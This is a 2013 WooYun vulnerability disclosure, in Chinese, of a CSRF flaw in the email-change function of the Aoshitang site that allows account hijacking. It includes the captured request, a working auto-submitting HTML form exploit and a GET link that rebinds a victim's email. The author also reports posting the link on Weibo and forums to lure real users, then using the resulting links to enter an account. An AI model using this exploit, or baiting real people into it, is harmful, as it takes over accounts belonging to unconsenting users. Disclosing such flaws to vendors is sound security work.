当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032138

漏洞标题:傲世堂绑定邮箱CSRF可劫持账户(已证明)

相关厂商:傲世堂

漏洞作者: xfkxfk

提交时间:2013-07-24 18:55

修复时间:2013-09-07 18:56

公开时间:2013-09-07 18:56

漏洞类型:CSRF

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-24: 细节已通知厂商并且等待厂商处理中
2013-07-24: 厂商已经确认,细节仅向厂商公开
2013-08-03: 细节向核心白帽子及相关领域专家公开
2013-08-13: 细节向普通白帽子公开
2013-08-23: 细节向实习白帽子公开
2013-09-07: 细节向公众公开

简要描述:

傲世堂绑定邮箱CSRF可劫持账户

详细说明:

1、出现CSRF的地方在更换用户邮箱处。
我们先用自己的小号邮箱注册一个账户xfkxfk。然后来更换邮箱,点击“更换邮箱”:

1.png


2、然后我们先随便输入一个邮箱地址,如下图88888888@qq.com这个邮箱:

2.png


3、点击提交后,会往这个邮箱发送一个认证激活邮件。
4、这时,我们截断抓包,请求信息如下:

POST /user!changeEmail.action HTTP/1.1
Host: www.aoshitang.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.aoshitang.com/changeEmail.action?redirectUrl=index.jsp
Cookie: **********
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
email=88888888%40qq.com&redirectUrl=index.jsp


5、然后我们构造如下的poc:

<html>
<body>
<form id="xfkxfk" name="xfkxfk" action="http://www.aoshitang.com/user!changeEmail.action" method="POST">
<input type="text" name="email" value="88888888@qq.com" />
<input type="text" name="redirectUrl" value="index.jsp" />
<input type="submit" value="submit">
</form>
<script>
document.xfkxfk.submit();
</script>
</body>
</html>


6、打开上面的poc结果如下:

5.png


7、这时已经成功更换了邮箱为88888888@qq.com:

3.png


返回主页,查看资料时,邮箱已经成功更换!

4.png


8、其实这里还可以把POST更改成GET请求,结果也是可行的。
下面我们把邮箱换成999999999@qq.com,构造GET请求连接:

http://www.aoshitang.com/user!changeEmail.action?email=999999999@qq.com&redirectUrl=index.jsp


9、最后我们把GET请求发到我们流量比较大的微博上:

6.png


10,下面我们换另一个测试账号tester,登陆tester,然后点击我们的微博连接。
tester之前的邮箱:

7.png


看看抓包,referer的却是weibo.com的,从返回看已经跳转到发邮件页面了:

xxxxx.png


点击微博链接后:

8.png


我们来看tester的资料,邮箱已成功被更改:

9.png


11、最后我们换成自己的真实邮箱,然后发布连接到微博,然后tester点击链接,看看能不能收到邮箱认证激活邮件:

10.png


成功收到更换邮件并收到认证激活邮件!
综上确定邮箱更换存在CSRF漏洞。

漏洞证明:

而且我们可以把这个连接发到论坛里面,诱惑用户点击这个链接,当然就可以大量更换用户的邮箱到我们的邮箱想了。
第一次我发了,没过,审核说是太理论了,没有证明,今天我再发一次,有证明的,我把链接发到论坛里,weibo.com里,多发一些,今天邮箱收到链接了:

1.png


然后我们点击一下这个连接,就进入账户了:

证明2.png


当然危害就不用说了,都更换了邮箱,想干嘛可想而知了。

修复方案:

1、判断referer
2、加token
3、等等

版权声明:转载请注明来源 xfkxfk@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-07-24 19:56

厂商回复:

谢谢xfkxfk,正在安排修复

最新状态:

暂无